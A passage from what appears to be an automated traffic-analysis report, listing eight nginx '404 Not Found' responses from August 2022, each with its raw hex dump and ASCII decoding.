padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:17 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:20 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:21 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:23 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:24 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:25 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:29 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:30 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:31 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
